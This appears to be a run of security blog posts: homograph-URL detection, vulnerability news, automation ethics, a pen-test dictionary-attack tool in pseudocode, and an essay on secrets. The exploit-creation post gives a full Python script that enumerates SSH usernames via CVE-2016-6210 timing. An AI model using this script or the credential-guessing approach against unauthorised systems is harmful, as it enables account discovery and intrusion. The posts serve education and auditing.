How closely do you scrutinize the URLs that you click in a browser? Are you the wild type who clicks links before reading them? Or perhaps you are the cautious type — one of the careful few who hover over a link (without clicking), check the address that appears in the browser bar, and confirm that the site has a valid certificate (which may not mean as much as people think).
Let’s say that you are trying to get to ‘facebook.com’. You see a link and hover over it. The URL that appears in the browser bar says ‘facebook.com’. You click the link, but it takes you to a phishing site.
What happened? You checked the link. It said it was ‘facebook.com’!
You may have fallen victim to an IDN homograph attack. A homograph is a word that shares its written form with another word that has a different meaning. In the example above, the user clicked a link that looked like ‘facebook.com’ but pointed somewhere else entirely. How can that happen? The ‘how’ comes from the ‘IDN’ portion of the name: ‘internationalized domain name’.

The URL in the address bar points to a domain name — the human-readable name of a website. The real address of a website (server) is an IP address, but people aren’t great at remembering those, so domain names make them memorable. For example, you can remember ‘facebook.com’ (the domain name) or you can remember ‘18.104.22.168’ (the IP address).

The problem with domain names is that there are many languages. How do you support Mandarin characters in a domain name? Or Russian? You have to internationalize your ‘charset’ (the set of allowed characters, or individual letters). By internationalizing your charset, you accept a far greater number of characters than just simple English (Latin-based) ones, which lets people have domain names in their own language. But there is a downside: the same glyph may appear multiple times under different languages. For example, the Cyrillic and Greek alphabets share characters (letters) that look very close, if not identical, to their Latin counterparts — yet each has its own separate identifier.
In the facebook example, the lower-case letter ‘o’ has the character code ‘006F’ in the Latin alphabet (“Latin small letter o”), but ‘03BF’ in the Greek alphabet (“Greek small letter omicron”). If I were to register a domain name of facebook.com but with the Greek version of those letters, it might pass internationalized domain name registration. I could then use this URL to trick people into clicking the link, because it will visually look like the real thing. An even simpler example is the substitution of a capital ‘O’ with the number zero (0) in the domain name.
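The distinction is easy to see in Python: the two glyphs render nearly identically, yet their code points differ, and the IDNA machinery encodes the spoofed label to a visibly different ASCII form.

```python
latin_o = '\u006f'   # Latin small letter o (code point 006F)
greek_o = '\u03bf'   # Greek small letter omicron (code point 03BF)

print(latin_o, greek_o)        # the two glyphs render almost identically
print(latin_o == greek_o)      # False -- they are different characters

# A spoofed domain using the Greek omicron in place of the Latin 'o'.
spoofed = 'faceb\u03bfok.com'

# IDNA ToASCII converts the non-Latin label to its 'xn--' punycode form,
# which is how browsers can reveal the spoof.
print(spoofed.encode('idna'))
```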
I wanted to see if I could detect these types of attacks and flag them using basic statistics.
My idea was quite simple: each character in a charset has a unique identifier (a number), and alphabets (or charsets) are grouped together, so their identifiers will be close together. The plan was to run basic statistical analysis (mean, median, max, min, and standard deviation) on the individual characters of a URL (or domain name). If there are characters outside the usual range, throw a ‘red flag’. I also had to account for the fact that punctuation may throw off any analysis, so there had to be at least a few methods to identify anomalies — hence the calculation of mean, median, max, min, and standard deviations. I avoided using neural networks for this particular problem although, as you will see in my summary/future-works section, I can see merit in taking it that way.
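A minimal sketch of that idea (a simplified illustration, not the project’s actual code; ‘char_stats’ is a name I made up):

```python
import statistics

def char_stats(domain):
    """Summary statistics over the Unicode code points of a domain name."""
    # Skip punctuation such as '.' and '-', which would skew the numbers.
    codes = [ord(c) for c in domain if c.isalnum()]
    return {
        'mean': statistics.mean(codes),
        'median': statistics.median(codes),
        'stdev': statistics.stdev(codes),
        'min': min(codes),
        'max': max(codes),
    }

print(char_stats('facebook.com'))        # every value sits in the ASCII range
print(char_stats('faceb\u03bfok.com'))   # the omicron (959) blows out max, mean, and stdev
```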
I wanted a basic proof-of-concept system that would take a corpus of known valid URLs and derive a statistical model from them. Then I would use this model to compare new URLs and determine if they are within the same alphabet or if there was a possibility that they were homograph attacks.
You can see/fork/download the project code here: https://github.com/calebshortt/homograph_detector
The project is quite simple and has two files in the main ‘base’ package. The ‘meat’ of the system is in the analysis.py file. The ‘results.py’ file was used to manage and compare results.
The flow is straightforward: build the statistical model from the corpus, then compare each new URL’s statistics against it.
The comparison function simply takes the statistics for the given test string and compares it (based on a defined number of standard deviations — default 2) to the model statistics — these are based on mean, median, and the standard deviations themselves (I actually created a metric that is the standard deviation of standard deviations). It also compares the max and min ranges of the character identifiers — this is a crude way to check the number ranges.
Here is the comparison function code:
```python
def compare(self, str_stats, stdev_threshold=2):
    """
    :param str_stats: ResultSet object
    :param stdev_threshold: (int) number of standard deviations allowed
    :return:
    """
    print('Analysing: Threshold: %s standard deviations...' % stdev_threshold)

    str_max = str_stats.result_max
    str_min = str_stats.result_min
    str_mean = str_stats.mean_means
    str_median = str_stats.mean_medians
    str_stdev = str_stats.mean_stdevs

    # Crude range check: the test string's characters must fall
    # inside the model's observed min/max identifier range.
    if not (self.result_min <= str_min <= str_max <= self.result_max):
        return False, str_stats.all_stats, 'max/min range'

    r_mean_low = self.mean_means - stdev_threshold * self.stdev_means
    r_mean_high = self.mean_means + stdev_threshold * self.stdev_means
    if not (r_mean_low <= str_mean <= r_mean_high):
        return False, str_stats.all_stats, 'mean'

    r_median_low = self.mean_medians - stdev_threshold * self.stdev_medians
    r_median_high = self.mean_medians + stdev_threshold * self.stdev_medians
    if not (r_median_low <= str_median <= r_median_high):
        return False, str_stats.all_stats, 'median'

    r_std_low = self.mean_stdevs - stdev_threshold * self.stdev_stdevs
    r_std_high = self.mean_stdevs + stdev_threshold * self.stdev_stdevs
    if not (r_std_low <= str_stdev <= r_std_high):
        return False, str_stats.all_stats, 'stdev'

    return True, str_stats.all_stats, None
```
NOTE: The above code compares the given string to the model ResultSet data in ‘self’.
The system was able to digest a Latin alphabet-based corpus (included in the source) and correctly identify URLs that had characters from other alphabets in them. The interesting thing about this method is that once the model is generated based on the corpus, it can be recorded and reused — no need to regenerate the model (which took the most time). The system was fast and quite accurate at first glance, although more analysis would be needed to make any real claims on its accuracy.
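Persisting such a model is trivial, since it reduces to a handful of numbers. A sketch, assuming a simple dict of stats (the field values below are made up, and the repo may store its model differently):

```python
import json

# Hypothetical model statistics from a corpus pass (the field names mirror
# those used in compare(), but the values here are invented for illustration).
model = {
    'mean_means': 104.7, 'stdev_means': 3.2,
    'mean_medians': 105.0, 'stdev_medians': 3.5,
    'mean_stdevs': 5.8, 'stdev_stdevs': 1.1,
    'result_min': 45, 'result_max': 122,
}

# Save once after the slow corpus pass...
with open('model.json', 'w') as f:
    json.dump(model, f)

# ...then reload instantly on later runs instead of regenerating.
with open('model.json') as f:
    reloaded = json.load(f)
```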
My file-load function breaks on some charsets, as they are not covered by the default encoding of Python’s file-loading function (that, or I missed something). I am working to fix this without clobbering the original encoding of the URL (which would defeat the purpose of this experiment).
This is already starting to look like a neural network would work nicely for this particular problem. I would like to feed the model stats into an ANN with perhaps some other inputs and see how it does. The basic stats I used were able to get decent results, but there are obvious edge cases that standard statistics wouldn’t identify (such as the old ‘substitute the 0 (zero) in for capital O’ trick). A neural network may help catch those.
I would say that it is quite possible to identify IDN homograph attacks using basic statistics and there are a few paths forward to improve accuracy with the results already demonstrated. With that said, nothing will compare to the standard ‘look before you click’ mentality. Users who identify the ‘0 instead of O’ substitution will not leave as much to chance. Systems like these aren’t catch-alls.
It has been an interesting year of breaches, vulnerabilities, and scares: from the recent ROCA vulnerability in Infineon’s TPM, a module widely used in the smart card industry, to the less-exploitable-but-still-serious KRACK vulnerability that makes attacking the WPA2 Wi-Fi security protocol possible, to the supply chain attack on CCleaner, a popular utility for cleaning up a user’s computer.
What is clearly emerging from such events is that there is still much work to be done in the security space. The Ixia Security Report for 2017 describes an increase in the amount of malware and an increase in the size of companies’ attack surfaces. The attack surface is the exposed, or public-facing, “surface area” of a company. Some have attributed the growing attack surface to increased usage and misconfiguration of cloud infrastructure. They argue that server misconfiguration looks to be replacing some of the more traditional OWASP Top 10 vulnerabilities, such as SQL injection.
But the vulnerabilities listed above (ROCA, KRACK, and the CCleaner supply chain attack) aren’t necessarily cloud-related.
ROCA relates to an incorrectly-implemented software library — specifically its key pair generation. It allows an attacker to recover the private (secret) key using only the public key. Modern encryption relies on a public key (sent to whoever wants it) and a secret (private) key that only the owner holds and uses to decrypt messages. Only the private key can decrypt messages to the owner. This vulnerability allows anyone with the public key and some decent computational power (say, an AWS cluster used to number-crunch) to derive the original private key and decrypt messages sent to the owner. The computational power required is in the realm of “expensive but possible”: a targeted attack is a very real possibility, but widespread breaching would be infeasible.
KRACK involves a replay attack. “By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic”. This vulnerability requires a physical component as the attacker will have to be on the Wi-Fi network. The cause is inherent to the standard — which means all correctly-implemented versions of the standard are vulnerable (i.e. Libraries that implemented it to spec). Many security practitioners have taken this particular moment in time to explain that the usage of a Virtual Private Network (VPN) would mitigate such attacks, and that Wi-Fi should be an un-trusted source to begin with.
The CCleaner supply chain attack involved an injection of malware into a library used in the implementation of CCleaner. When the CCleaner program is packaged and deployed, it includes this third-party library in its package. This type of attack takes advantage of consumers’ trust in CCleaner, and it is becoming a more popular technique among attackers. For the record, CCleaner has been sanitized and is no longer a threat from this malware. I imagine Avast, the company that offers CCleaner, also took a look at its supply chain trust and revamped some policies around it.
Each of these attacks comes in addition to the general increase in attack surface and the increasingly common misconfiguration of servers. Supply chain attacks are on the rise because they clearly work. There are plenty of incorrect implementations of standards or protocols that attackers can take advantage of. Far less often, there are errors in the standards or protocols themselves.
It may seem like the odds are piled against an organization’s security team. They are. That is why security is not only the responsibility of the security team, but the entire organization from the executive branch to the developers (who choose to implement specific libraries in their software) to the tech support teams that are often on the “front-line” with customers.
Education is always a good first step.
For those who haven’t watched ‘The Secret Life of Walter Mitty’, I highly recommend a showing. It follows Walter Mitty, a daydreaming “negative asset manager” at LIFE magazine during its conversion to a fully-online offering. It truly is a visually stunning work.
The opening premise — LIFE magazine moving online and the inevitable downsizing and layoffs — struck a chord that has been, and is still, resonating: is there a place for morality in software developers’ drive toward automation and efficiency?
One would be quite right in saying that the issue of ‘worker layoffs due to automation’ is not a new problem. History is full of examples. What piques my interest, however, is the generality of software automation. The immense reach of software naturally leads to an immense number of avenues for automation.
For example: I found myself talking with a colleague about the problems he was having with some of his staff. When we finally distilled the problem down to its essence, we discovered that a great portion of his department was dedicated to the handling and sorting of files (originally electronic, then printed, then sorted and filed). I found myself flippantly stating that I could replace most of his department with a script.
My watching of ‘Walter Mitty’ sparked a wave of introspection, and a single question welled within me: If I could write a script that replaces an entire department, should I?
The script would increase the company’s efficiency through a significant reduction in cost. But why is efficiency so important that one would look for avenues to terminate the employment of others? Who benefits from it? Recently, it seems, the cost savings would not make its way to the remaining employees but would manifest as bonuses for an executive or manager, or perhaps dividends for shareholders.
Is inefficiency really that bad? In this case a department is being employed to do work. They are doing the work satisfactorily. Their wages pay for local food, rent, and expenses. This provides a boon to the local economy. If the populace is scraping by financially they surely will not be purchasing cars, houses, or other ‘big ticket items’. Would this not stagnate the greater economy?
Would a 100%-efficient company have anyone working there?
My authorship of this script directly instigates the termination of those employees. The causative relationship is undeniable.
Such scenarios are drenched in hubris, as such mechanisms are en route to replacing developers as well. In this we are the architects of our own obsolescence and ultimate demise. It is pure arrogance to assume such devices would not also be applied to our craft.
Some may argue that apparatuses are in place to mitigate such effects, or that the evolution of the market warrants the employees’ termination: ‘They have become obsolete and must retool to stay competitive’, or ‘that is what welfare is for’, or ‘universal basic income is the future for this very reason’. Such comments do not address my question, ‘If one could write a script to replace a large group of people’s jobs, should they?’; rather, they address the symptom, or after-effects, of such a decision — the employees are terminated, now what?
Perhaps this is the issue?
At the risk of sounding defensive I must note that I am not one to resist change. Resistance to change in our particular field is a doomed prospect to say the least. But one must address the social and economic implications of their decisions. One must have a conscience.
I do not have an answer. The creation of software is a technical achievement, a work of art, a labor of love, and wildly creative. It behooves those who embark on such journeys to consider their implications. Perhaps it is our hubristic tendencies as developers, or our arrogance, that drives us to construct our own monsters. Dr. Frankenstein would surely have words with us.
In running a mock pen-test I ran into an interesting wall with one of my tools, Burp Suite Free Edition. I also discovered some limitations in ncrack, and metasploit’s auxiliary/scanner/ssh/ssh_login tool.
Let’s start at the beginning.
What I needed was a simple dictionary attack tool that would take a list of usernames and a list of passwords and try them on the target. All of these tools do exactly this, but I ran into limitations that made them unusable for this particular use case. My target was a group of VMs that simulated servers under higher-than-average load. SSH was enabled, and one server included a web form to sign in to (not tied to the SSH accounts). The servers were prone to dropping connections and timing out.
This wreaked havoc on ncrack and ssh_login. There are parameters to help with timing and level of aggressiveness (i.e. ssh_login’s ‘BRUTEFORCE_SPEED’ parameter, and the ‘cd’ and ‘T<0-5>’ flags for ncrack), but if a connection took too long or dropped completely, the tools would simply move on to the next username and password combination. In my particular use case this was unacceptable. I tried hydra with better-but-still-limited success (its -w <time> flag helped). In the end I decided to quickly write my own simple script.
Considering my requirements (expecting longer-than-normal wait times/timeouts/etc) I was not worried about writing my script in anything particularly fast (I chose Python). What I did want was a tool that was robust against varying timeouts and lengthy responses. I did this with a linear back-off and retry approach. I didn’t want exponential back-off as I still needed to complete the process — linear would do fine.
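The retry logic can be isolated into a small helper. This is a sketch of the approach, not the repo’s exact code, and ‘try_with_backoff’ is a name of my own invention:

```python
import time

def try_with_backoff(attempt_fn, max_attempts=5, base_wait=1):
    """Call attempt_fn until it succeeds, sleeping 1s, 2s, 3s, ... between failures."""
    wait = base_wait
    for attempt in range(1, max_attempts + 1):
        try:
            return attempt_fn()
        except ConnectionError:
            if attempt == max_attempts:
                raise  # out of attempts: surface the error instead of skipping the guess
            time.sleep(wait)
            wait += base_wait  # linear back-off: keep trying, just more politely
```

Each username/password guess gets wrapped in `try_with_backoff`, so a dropped connection retries the same credentials rather than silently moving on to the next pair.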
The meat of the script simply looked as follows:
```
connected = False
wait_backoff = 1
max_attempts = 5
curr_attempt = 0

for user in userlist:
    for pw in passlist:
        while not connected:
            try:
                curr_attempt += 1
                connect to target with user and pw
            except ssh problem:
                reinitialize ssh connection
                wait for wait_backoff seconds
                increment wait_backoff
                if curr_attempt is at or over max_attempts:
                    exit with error message
            else:
                connected = True
        connected = False
        curr_attempt = 0
        wait_backoff = 1
```
The full code can be seen at https://github.com/calebshortt/sshBF/blob/master/ssh_bruteforce.py. This isn’t a brute-force attack but a dictionary attack. This solved my problem of hydra, ssh_login, and ncrack completely stopping if they encounter some slow/laggy servers.
After I had completed my SSH audit, I turned my attention to the login web form. It was an HTTP POST to an API endpoint. Burp Suite was my first thought, so I started it up. I had the Free Edition and figured this task was simple enough not to need the paid version of the tool. I was wrong. Burp Suite Free Edition technically allows dictionary attacks on web servers but throttles them to the point of being unusable — an obvious ploy to push users toward the full version. I decided to modify my SSH script and use it on web forms instead.
This was surprisingly easy, required little change to the SSH script, and ran significantly faster than Burp Suite. I was able to complete my audit with a few extra tools.
The web form code can be found at: https://github.com/calebshortt/web_dict_bf
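Adapting the SSH script mostly meant swapping the connect call for an HTTP POST. A minimal stdlib sketch; the endpoint URL and form field names here are hypothetical, not taken from the repo:

```python
import urllib.parse
import urllib.request

def build_login_request(url, username, password):
    """Build (but don't send) a form-encoded POST for one credential guess."""
    data = urllib.parse.urlencode({
        'username': username,   # hypothetical form field names
        'password': password,
    }).encode()
    return urllib.request.Request(url, data=data, method='POST')

# Sending it would be urllib.request.urlopen(req, timeout=10),
# wrapped in the same linear back-off/retry loop as the SSH version.
req = build_login_request('http://example.test/login', 'admin', 'hunter2')
```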
The EFF has published a well-cited and informed article on why they view the current trend of dragnet surveillance to be thoroughly against the constitution of the U.S.
Even if you are not an American, this article touches on the ideals of many. It describes the context around why the Fourth Amendment was included and goes into specific detail as to who and why they thought it so important:
“Using ‘writs of assistance,’ the King authorized his agents to carry out wide ranging searches to anyone, anywhere, and anytime regardless of whether they were suspected of a crime. These ‘hated writs’ spurred colonists toward revolution and directly motivated James Madison’s crafting of the Fourth Amendment.”
I highly recommend reading the entire article: The NSA’s “General Warrants”: How the Founding Fathers Fought an 18th Century Version of the President’s Illegal Domestic Spying
Creating a software exploit usually involves two general steps.
The first step is vulnerability discovery. This is the harder of the two. It requires in-depth knowledge of the target software, device, or protocol, and a creative mind tuned to edge cases and exceptions.
The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.
This article will address the second step: Exploit creation.
First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (sometimes with example code) in a searchable format — a few examples are CVE, Exploit-DB, and the NVD.
Looking through these databases we will see that all published vulnerabilities have a unique CVE identifier. They uniquely identify each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target (Note: This is similar to what a bot might try, after it has scanned a new target server, to find any published vulnerabilities).
Some vulnerability descriptions may even include sample code — such as CVE-2016-6210. This makes it trivial to write a script that utilizes the vulnerability. For example, we could take the code given in CVE-2016-6210 and expand it into a command-line script that takes a list of known usernames and tries each one… which is exactly the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.
This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.
Given the sample code, here is our improved version:
```python
# Note: this is a Python 2 script (xrange, reduce, time.clock).
import paramiko
import time
import argparse
import logging

logging.basicConfig()


class Engine(object):

    file_path = None
    target = ''
    userlist = ['root']
    calc_times = []
    req_time = 0.0
    num_pools = 10

    def __init__(self, target, filepath=None, req_time=0.0):
        self.req_time = req_time
        self.target = target
        self.file_path = filepath
        if self.file_path:
            self.load_users(filepath)

    def load_users(self, filepath):
        data = []
        with open(filepath, 'r') as f:
            data = f.read().splitlines()
        self.userlist = data

    def partition_list(self, p_list):
        p_size = len(p_list) / self.num_pools
        for i in xrange(0, len(p_list), p_size):
            yield p_list[i:i + p_size]

    def execute(self):
        for user in self.userlist:
            self.test_with_user(user)

    def test_with_user(self, user):
        # A very long password forces extra server-side work for valid users,
        # making the timing difference measurable.
        p = 'A' * 25000
        ssh = paramiko.SSHClient()
        start_time = time.clock()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        end_time = time.clock()
        try:
            ssh.connect(self.target, username=user, password=p)
        except:
            end_time = time.clock()
        total = end_time - start_time
        self.calc_times.append(total)
        avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)
        flag = '*' if total > avg else ''  # flag usernames with above-average response times
        print('%s:\t\t%s\t%s' % (user, total, flag))
        time.sleep(self.req_time)
        ssh.close()


def main(ip_addr, filename=None, req_time=0.0):
    if ip_addr == '' or not ip_addr:
        print('No target IP specified')
        return
    if filename == '':
        filename = None
    engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)
    engine.execute()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 >= version')
    parser.add_argument('ip', help='[Required] The IP of the target server')
    parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')
    parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')

    ip_addr = None
    filename = None
    req_time = 0.0

    args = parser.parse_args()
    if args.ip:
        ip_addr = args.ip
    if args.userlist:
        filename = args.userlist
    if args.time:
        req_time = float(args.time)

    main(ip_addr, filename, req_time)
```
It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.
This is why it is vital that system admins keep their servers and software up to date.
Suppose that, while teaching a class some engaging topic, I keep a secret from the class and only reveal it at the end of the term. This secret provides a sudden realization to the students that they can take into their next year — A real ‘Aha! moment’. I only ask them that they do not reveal the secret to any classes that haven’t taken the course yet so that they can have the same experience. This may work for a while, but inevitably one student, through malice or ignorance, will reveal the secret to someone they shouldn’t have. This then spreads throughout the whole student body until the experience for all future classes is ruined.
The value of a secret can be tied inherently to its secrecy. In the case above, revealing the secret leads to a realization and experience that would have been lost if the knowledge was simply given in a standard manner. We see this in varying degrees in many mediums.
Suspense films can rely on building a feeling without ‘revealing’. String along the audience and tease them with sudden glimpses — or was it? Sometimes the ‘secret’ is never actually revealed and the audience is left wondering what ‘it’ could have been — a lasting effect to be sure! Sometimes the ‘secret’ is revealed to the audience but not to the characters, and the audience is left to observe the resulting effect on the unknowing participants. All experiences in the case of suspense are tied directly to the disclosure or non-disclosure of a secret — and to whom.
Consider the explorer. In ages past an explorer set out into unknown lands or seas to make the ‘unknown’ known. Perhaps it was for knowledge, or perhaps it was for fame, but many died in the pursuit. Today we can say the same about space — our chosen few lead our race in discovering one of the last great ‘unknowns’.
Our desire to discover what is not known is insatiable. We thrive on the pursuit. We revel in it.
Now, perhaps, you are wondering why the title of this article is ‘The Value of A Secret’ and not ‘Humans Love to Discover’. And my answer to you would be that it is important to set the stage for things that are yet to come.
Humans do love to discover — Even if it means that the discovery will reduce their enjoyment.
Let’s consider the magician. We can rest assured that the man standing on stage and pulling rabbits out of hats does not, for better or worse, have divine powers. He has honed his craft, that is to be sure, but he is no wizard. He is an expert at deceiving. Our wonder stems from the curiosity welling within each person sitting in the faux-velvet seats that, at one time, may have doubled as beer coasters. It is that curiosity that may also drive us to speculate on how the trick was done or to buy a ticket to see it again. The experience is in the deception. Once the secret is revealed the experience is ruined for all, and the poor magician who mastered his craft must now work ever harder, and be ever more devious, in his deceptions.
There can be value for those to whom the secret is not revealed — and never is. Secrets can be a source of awe and wonder. They can drive one to build a ship and cross vast oceans, throw caution to the wind and trek into unknown lands, and build a rocket and ride it to the moon.
For the explorer, who is driven by such experiences, there is irony in the fact that their very actions reduce the total number of things left to discover — no matter how little the contribution.
With the awe and inspiration that secrets can evoke, it is important to note that some secrets are meant to be discovered and shared. What would have happened if Alexander Fleming had not discovered penicillin and shared it with the world? What about the snake-oil salesmen and ‘men with powers’ who used their secrets not to entertain but to deceive many, to their detriment? We would agree that it is important to expose frauds and predatory practices.
This is not to say that secrets should never be revealed, but that there is value in many secrets staying secret. This value may take the form of awe, wonder, suspense, entertainment, or inspiration, to name a few. Lastly, it is important to note that secrets also protect you.
How do you hide dissidents from oppressive governments without secrets? Just because one lives in a developed country does not make them immune to policy change and legislation. What about communication? How can you talk with the assurance that there isn’t anyone listening in to your conversation? Shouldn’t your bank information be kept secret from prying eyes?
Sometimes it is important to have secrets. Secrets that are hidden from everyone but the very few people you trust to hold them. If one of your trusted few ever reveals the secret, they are removed from the privileged few.
Many governments in recent times should be removed from the privileged few.